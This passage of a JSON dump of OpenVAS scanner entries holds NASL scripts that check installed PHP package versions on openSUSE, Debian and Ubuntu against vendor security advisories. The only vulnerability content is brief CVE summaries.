isrpmvuln(pkg:\"php7-gd-debuginfo\", rpm:\"php7-gd-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gettext\", rpm:\"php7-gettext~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gettext-debuginfo\", rpm:\"php7-gettext-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gmp\", rpm:\"php7-gmp~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-gmp-debuginfo\", rpm:\"php7-gmp-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-iconv\", rpm:\"php7-iconv~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-iconv-debuginfo\", rpm:\"php7-iconv-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-imap\", rpm:\"php7-imap~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-imap-debuginfo\", rpm:\"php7-imap-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-intl\", rpm:\"php7-intl~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-intl-debuginfo\", rpm:\"php7-intl-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-json\", rpm:\"php7-json~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-json-debuginfo\", rpm:\"php7-json-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ldap\", rpm:\"php7-ldap~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-ldap-debuginfo\", rpm:\"php7-ldap-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mbstring\", rpm:\"php7-mbstring~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mbstring-debuginfo\", rpm:\"php7-mbstring-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mcrypt\", rpm:\"php7-mcrypt~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mcrypt-debuginfo\", rpm:\"php7-mcrypt-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mysql\", rpm:\"php7-mysql~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-mysql-debuginfo\", rpm:\"php7-mysql-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-odbc\", rpm:\"php7-odbc~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-odbc-debuginfo\", rpm:\"php7-odbc-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-opcache\", rpm:\"php7-opcache~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-opcache-debuginfo\", rpm:\"php7-opcache-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-openssl\", rpm:\"php7-openssl~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-openssl-debuginfo\", rpm:\"php7-openssl-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pcntl\", rpm:\"php7-pcntl~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pcntl-debuginfo\", rpm:\"php7-pcntl-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pdo\", rpm:\"php7-pdo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pdo-debuginfo\", rpm:\"php7-pdo-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pgsql\", rpm:\"php7-pgsql~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pgsql-debuginfo\", rpm:\"php7-pgsql-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-phar\", rpm:\"php7-phar~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-phar-debuginfo\", rpm:\"php7-phar-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-posix\", rpm:\"php7-posix~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-posix-debuginfo\", rpm:\"php7-posix-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pspell\", rpm:\"php7-pspell~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pspell-debuginfo\", rpm:\"php7-pspell-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-readline\", rpm:\"php7-readline~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-readline-debuginfo\", rpm:\"php7-readline-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-shmop\", rpm:\"php7-shmop~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-shmop-debuginfo\", rpm:\"php7-shmop-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-snmp\", rpm:\"php7-snmp~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-snmp-debuginfo\", rpm:\"php7-snmp-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-soap\", rpm:\"php7-soap~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-soap-debuginfo\", rpm:\"php7-soap-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sockets\", rpm:\"php7-sockets~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sockets-debuginfo\", rpm:\"php7-sockets-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sqlite\", rpm:\"php7-sqlite~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sqlite-debuginfo\", rpm:\"php7-sqlite-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvmsg\", rpm:\"php7-sysvmsg~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvmsg-debuginfo\", rpm:\"php7-sysvmsg-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvsem\", rpm:\"php7-sysvsem~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvsem-debuginfo\", rpm:\"php7-sysvsem-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvshm\", rpm:\"php7-sysvshm~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-sysvshm-debuginfo\", rpm:\"php7-sysvshm-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tidy\", rpm:\"php7-tidy~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tidy-debuginfo\", rpm:\"php7-tidy-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tokenizer\", rpm:\"php7-tokenizer~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-tokenizer-debuginfo\", rpm:\"php7-tokenizer-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-wddx\", rpm:\"php7-wddx~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-wddx-debuginfo\", rpm:\"php7-wddx-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlreader\", rpm:\"php7-xmlreader~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlreader-debuginfo\", rpm:\"php7-xmlreader-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlrpc\", rpm:\"php7-xmlrpc~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlrpc-debuginfo\", rpm:\"php7-xmlrpc-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlwriter\", rpm:\"php7-xmlwriter~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xmlwriter-debuginfo\", rpm:\"php7-xmlwriter-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xsl\", rpm:\"php7-xsl~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-xsl-debuginfo\", rpm:\"php7-xsl-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zip\", rpm:\"php7-zip~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zip-debuginfo\", rpm:\"php7-zip-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zlib\", rpm:\"php7-zlib~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-zlib-debuginfo\", rpm:\"php7-zlib-debuginfo~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pear\", rpm:\"php7-pear~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"php7-pear-Archive_Tar\", rpm:\"php7-pear-Archive_Tar~7.0.7~19.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-07-04T18:55:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12933", "CVE-2017-11143", "CVE-2017-11628", "CVE-2017-16642", "CVE-2017-11145", "CVE-2017-11144", "CVE-2017-11142"], "description": "Several vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language:\n\nCVE-2017-11142\nDenial of service via overly long form variables\n\nCVE-2017-11143\nInvalid free() in wddx_deserialize()\n\nCVE-2017-11144\nDenial of service in openssl extension due to incorrect return value\ncheck of OpenSSL sealing function.\n\nCVE-2017-11145\nOut-of-bounds read in wddx_deserialize()\n\nCVE-2017-11628\nBuffer overflow in PHP INI parsing API\n\nCVE-2017-12933\nBuffer overread in finish_nested_data()\n\nCVE-2017-16642\nOut-of-bounds read in timelib_meridian()", "modified": "2019-07-04T00:00:00", "published": "2018-01-08T00:00:00", "id": "OPENVAS:1361412562310704081", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704081", "type": "openvas", "title": "Debian Security Advisory DSA 4081-1 (php5 - security update)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4081-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704081\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2017-11142\", \"CVE-2017-11143\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11628\", \"CVE-2017-12933\", \"CVE-2017-16642\");\n script_name(\"Debian Security Advisory DSA 4081-1 (php5 - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-08 00:00:00 +0100 (Mon, 08 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4081.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"php5 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), these problems have been fixed\nin version 5.6.33+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/php5\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were found in PHP, a widely-used open source\ngeneral purpose scripting language:\n\nCVE-2017-11142\nDenial of service via overly long form variables\n\nCVE-2017-11143\nInvalid free() in wddx_deserialize()\n\nCVE-2017-11144\nDenial of service in openssl extension due to incorrect return value\ncheck of OpenSSL sealing function.\n\nCVE-2017-11145\nOut-of-bounds read in wddx_deserialize()\n\nCVE-2017-11628\nBuffer overflow in PHP INI parsing API\n\nCVE-2017-12933\nBuffer overread in finish_nested_data()\n\nCVE-2017-16642\nOut-of-bounds read in timelib_meridian()\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php5\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libapache2-mod-php5filter\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libphp5-embed\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php-pear\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-cgi\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-cli\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-common\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-curl\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-dbg\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-dev\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-enchant\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-fpm\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-gd\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-gmp\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-imap\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-interbase\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-intl\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-ldap\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-mcrypt\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-mysql\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-mysqlnd\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-odbc\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-pgsql\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-phpdbg\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-pspell\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-readline\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-recode\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-snmp\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-sqlite\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-sybase\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-tidy\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-xmlrpc\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"php5-xsl\", ver:\"5.6.33+dfsg-0+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-10397", "CVE-2017-9224", "CVE-2017-9228", "CVE-2017-9226", "CVE-2017-11143", "CVE-2017-9229", "CVE-2017-9227", "CVE-2017-11628", "CVE-2015-8994", "CVE-2017-11147", "CVE-2017-11362", "CVE-2017-11145", "CVE-2017-11144"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-08-11T00:00:00", "id": "OPENVAS:1361412562310843281", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843281", "type": "openvas", "title": "Ubuntu Update for php7.0 USN-3382-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3382_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for php7.0 USN-3382-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843281\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-08-11 07:22:54 +0200 (Fri, 11 Aug 2017)\");\n script_cve_id(\"CVE-2015-8994\", \"CVE-2016-10397\", \"CVE-2017-11143\", \"CVE-2017-11144\",\n \"CVE-2017-11145\", \"CVE-2017-11147\", \"CVE-2017-11362\", \"CVE-2017-11628\",\n \"CVE-2017-9224\", \"CVE-2017-9226\", \"CVE-2017-9227\", \"CVE-2017-9228\",\n \"CVE-2017-9229\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for php7.0 USN-3382-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'php7.0'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that the PHP opcache\n created keys for files it cached based on their filepath. A local attacker could\n possibly use this issue in a shared hosting environment to obtain sensitive\n information. This issue only affected Ubuntu 14.04 LTS. (CVE-2015-8994) It was\n discovered that the PHP URL parser incorrectly handled certain URI components. A\n remote attacker could possibly use this issue to bypass hostname-specific URL\n checks. This issue only affected Ubuntu 14.04 LTS. (CVE-2016-10397) It was\n discovered that PHP incorrectly handled certain boolean parameters when\n unserializing data. A remote attacker could possibly use this issue to cause PHP\n to crash, resulting in a denial of service. This issue only affected Ubuntu\n 14.04 LTS. (CVE-2017-11143) Sebastian Li, Wei Lei, Xie Xiaofei, and Liu Yang\n discovered that PHP incorrectly handled the OpenSSL sealing function. A remote\n attacker could possibly use this issue to cause PHP to crash, resulting in a\n denial of service. (CVE-2017-11144) Wei Lei and Liu Yang discovered that the PHP\n date extension incorrectly handled memory. A remote attacker could possibly use\n this issue to disclose sensitive information from the server. (CVE-2017-11145)\n It was discovered that PHP incorrectly handled certain PHAR archives. A remote\n attacker could use this issue to cause PHP to crash or disclose sensitive\n information. This issue only affected Ubuntu 14.04 LTS. (CVE-2017-11147) It was\n discovered that PHP incorrectly handled locale length. A remote attacker could\n possibly use this issue to cause PHP to crash, resulting in a denial of service.\n (CVE-2017-11362) Wei Lei and Liu Yang discovered that PHP incorrectly handled\n parsing ini files. An attacker could possibly use this issue to cause PHP to\n crash, resulting in a denial of service. (CVE-2017-11628) It was discovered that\n PHP mbstring incorrectly handled certain regular expressions. A remote attacker\n could use this issue to cause PHP to crash, resulting in a denial of service, or\n possibly execute arbitrary code. (CVE-2017-9224, CVE-2017-9226, CVE-2017-9227,\n CVE-2017-9228, CVE-2017-9229)\");\n script_tag(name:\"affected\", value:\"php7.0 on Ubuntu 17.04,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3382-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3382-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone 